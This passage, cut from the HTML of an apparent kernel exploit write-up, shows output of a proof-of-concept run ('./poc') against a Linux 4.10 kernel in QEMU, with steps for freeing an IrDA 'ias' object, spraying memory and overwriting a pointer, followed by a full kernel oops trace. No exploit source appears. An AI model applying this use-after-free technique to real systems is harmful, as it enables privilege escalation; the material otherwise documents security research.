00000000023d0880(0000) GS:ffff88023fc00000(0000) knlGS:0000000000000000  [ 8.642882] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033  [ 8.642882] CR2: ffff88023623ad20 CR3: 0000000235e97000 CR4: 00000000000006f0  [ 8.642882] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000  [ 8.642882] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400  [ 8.642882] Call Trace:  [ 8.642882] ? proc_sys_make_inode+0xc1\/0x100  [ 8.642882] proc_sys_lookup+0xcf\/0x140  [ 8.642882] lookup_slow+0x91\/0x140  [ 8.642882] walk_component+0x195\/0x320  [ 8.642882] ? security_inode_permission+0x3c\/0x60  [ 8.642882] link_path_walk+0x18b\/0x5c0  [ 8.642882] ? path_init+0x1d4\/0x330  [ 8.642882] path_openat+0xe3\/0x1320  [ 8.642882] do_filp_open+0x79\/0xd0  [ 8.642882] ? do_nanosleep+0x92\/0xf0  [ 8.642882] ?
kmem_cache_alloc+0x2f\/0x150  [ 8.642882] ? getname_flags+0x51\/0x1f0  [ 8.642882] do_sys_open+0x116\/0x1f0  [ 8.642882] SyS_openat+0xf\/0x20  [ 8.642882] entry_SYSCALL_64_fastpath+0x13\/0x94  [ 8.642882] RIP: 0033:0x44769e  [ 8.642882] RSP: 002b:00007ffc4d7f1b00 EFLAGS: 00000246 ORIG_RAX: 0000000000000101  [ 8.642882] RAX: ffffffffffffffda RBX: 00000000006d18d8 RCX: 000000000044769e  [ 8.642882] RDX: 0000000000000000 RSI: 00000000004a8a46 RDI: ffffffffffffff9c  [ 8.642882] RBP: 0000000000000070 R08: 0000000000000001 R09: 000000000000000c  [ 8.642882] R10: 0000000000000000 R11: 0000000000000246 R12: 00000000006d1880  [ 8.642882] R13: 0000000000000065 R14: 00000000006d18d8 R15: 0000000000000000  [ 8.642882] Code: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 00 00 00 00 00 00 00 00 &lt;68&gt; 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  [ 8.642882] RIP: 0xffff88023623ad20 RSP: ffffc90001437b60  [ 8.642882] CR2: ffff88023623ad20  [ 8.642882] ---[ end trace 531b1224dce05ac9 ]---  [ 8.642882] Kernel panic - not syncing: Fatal exception  [ 8.642882] Kernel Offset: disabled  [ 8.642882] Rebooting in 1 seconds..<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5bad57622f369705235707-1\"><span class=\"crayon-sy\">.<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-i\">poc<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0xffffffff81efeb60<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f369705235707-2\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Freeing <\/span><span class=\"crayon-e\">the <\/span><span class=\"crayon-e\">first <\/span><span class=\"crayon-e\">queued <\/span><span class=\"crayon-e\">ias <\/span><span
class=\"crayon-t\">object<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f369705235707-3\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Spray <\/span><span class=\"crayon-e\">memory <\/span><span class=\"crayon-st\">and<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">take <\/span><span class=\"crayon-e\">control <\/span><span class=\"crayon-e\">of <\/span><span class=\"crayon-e\">the <\/span><span class=\"crayon-e\">old <\/span><span class=\"crayon-e\">freed <\/span><span class=\"crayon-t\">object<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f369705235707-4\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Allocating <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">object<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">to<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">overwrite <\/span><span class=\"crayon-e\">the <\/span><span class=\"crayon-e\">targetted <\/span><span class=\"crayon-i\">pointer<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f369705235707-5\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Freeing <\/span><span class=\"crayon-t\">object<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">again<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f369705235707-6\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8.641924<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">kernel 
<\/span><span class=\"crayon-e\">tried <\/span><span class=\"crayon-st\">to<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">execute <\/span><span class=\"crayon-v\">NX<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-m\">protected<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">page<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">exploit <\/span><span class=\"crayon-v\">attempt<\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">uid<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f369705235707-7\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8.642882<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">BUG<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">unable <\/span><span class=\"crayon-st\">to<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">handle <\/span><span class=\"crayon-e\">kernel <\/span><span class=\"crayon-e\">paging <\/span><span class=\"crayon-e\">request <\/span><span class=\"crayon-e\">at <\/span><span class=\"crayon-i\">ffff88023623ad20<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f369705235707-8\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8.642882<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">IP<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0xffff88023623ad20<\/span><\/div>\n<div class=\"crayon-line\" 
id=\"crayon-5bad57622f369705235707-9\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8.642882<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">PGD<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">212b067<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f369705235707-10\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8.642882<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">PUD<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">212e067<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f369705235707-11\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8.642882<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">PMD<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">80000002362001e3<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f369705235707-12\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8.642882<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f369705235707-13\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8.642882<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Oops<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0011<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-p\">#1] SMP<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f369705235707-14\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> 
<\/span><span class=\"crayon-cn\">8.642882<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Modules <\/span><span class=\"crayon-e\">linked <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f369705235707-15\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8.642882<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">CPU<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">PID<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1038<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Comm<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">xx <\/span><span class=\"crayon-st\">Not<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">tainted<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">4.10.0<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">rc8<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-p\">#6<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f369705235707-16\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8.642882<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Hardware <\/span><span class=\"crayon-v\">name<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">QEMU <\/span><span class=\"crayon-e\">Standard <\/span><span class=\"crayon-e\">PC<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span 
class=\"crayon-v\">i440FX<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">PIIX<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1996<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">BIOS <\/span><span class=\"crayon-v\">Ubuntu<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">1.8.2<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">1ubuntu1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">04<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">01<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">2014<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f369705235707-17\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8.642882<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">task<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">ffff88023575de00 <\/span><span class=\"crayon-v\">task<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">stack<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">ffffc90001434000<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f369705235707-18\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8.642882<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">RIP<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0010<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">0xffff88023623ad20<\/span><\/div>\n<div 
class=\"crayon-line\" id=\"crayon-5bad57622f369705235707-19\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8.642882<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">RSP<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0018<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-e\">ffffc90001437b60 <\/span><span class=\"crayon-v\">EFLAGS<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00010282<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f369705235707-20\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8.642882<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">RAX<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">ffff88023623ad20 <\/span><span class=\"crayon-v\">RBX<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">ffff880236c2d148 <\/span><span class=\"crayon-v\">RCX<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">ffff880236c2d150<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f369705235707-21\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8.642882<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">RDX<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">ffff880236c2d14c <\/span><span class=\"crayon-v\">RSI<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">ffff8802349a0a70 <\/span><span class=\"crayon-v\">RDI<\/span><span class=\"crayon-o\">:<\/span><span 
class=\"crayon-h\"> <\/span><span class=\"crayon-i\">ffff8802349a0a00<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f369705235707-22\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8.642882<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">RBP<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">ffffc90001437b88 <\/span><span class=\"crayon-v\">R08<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">ffff88023fc1b840 <\/span><span class=\"crayon-v\">R09<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">ffff880234b61230<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f369705235707-23\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8.642882<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">R10<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">2f2f2f2f2f2f2f2f<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">R11<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0000000000000000<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">R12<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">ffff8802349a0a00<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f369705235707-24\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8.642882<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">R13<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span 
class=\"crayon-e\">ffff8802349a0a70 <\/span><span class=\"crayon-v\">R14<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">ffffffff81efeb00 <\/span><span class=\"crayon-v\">R15<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0000000000000004<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f369705235707-25\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8.642882<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">FS<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00000000023d0880<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">0000<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">GS<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-e\">ffff88023fc00000<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">0000<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">knlGS<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">0000000000000000<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f369705235707-26\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8.642882<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">CS<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0010<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">DS<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0000<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ES<\/span><span class=\"crayon-o\">:<\/span><span 
class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0000<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">CR0<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0000000080050033<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f369705235707-27\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8.642882<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">CR2<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">ffff88023623ad20 <\/span><span class=\"crayon-v\">CR3<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0000000235e97000<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">CR4<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00000000000006f0<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f369705235707-28\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8.642882<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">DR0<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0000000000000000<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">DR1<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0000000000000000<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">DR2<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0000000000000000<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f369705235707-29\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span 
class=\"crayon-cn\">8.642882<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">DR3<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0000000000000000<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">DR6<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00000000fffe0ff0<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">DR7<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0000000000000400<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f369705235707-30\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8.642882<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Call <\/span><span class=\"crayon-v\">Trace<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f369705235707-31\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8.642882<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">proc_sys_make_inode<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0xc1<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0x100<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f369705235707-32\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8.642882<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">proc_sys_lookup<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0xcf<\/span><span class=\"crayon-o\">\/<\/span><span 
class=\"crayon-cn\">0x140<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f369705235707-33\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8.642882<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">lookup_slow<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x91<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0x140<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f369705235707-34\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8.642882<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">walk_component<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x195<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0x320<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f369705235707-35\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8.642882<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">security_inode_permission<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x3c<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0x60<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f369705235707-36\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8.642882<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">link_path_walk<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x18b<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0x5c0<\/span><\/div>\n<div class=\"crayon-line\" 
id=\"crayon-5bad57622f369705235707-37\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8.642882<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">path_init<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x1d4<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0x330<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f369705235707-38\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8.642882<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">path_openat<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0xe3<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0x1320<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f369705235707-39\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8.642882<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">do_filp_open<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x79<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0xd0<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f369705235707-40\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8.642882<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">do_nanosleep<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x92<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0xf0<\/span><\/div>\n<div class=\"crayon-line\" 
id=\"crayon-5bad57622f369705235707-41\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8.642882<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">kmem_cache_alloc<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x2f<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0x150<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f369705235707-42\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8.642882<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">getname_flags<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x51<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0x1f0<\/span><\/div>\n<div class=\"crayon-line\" 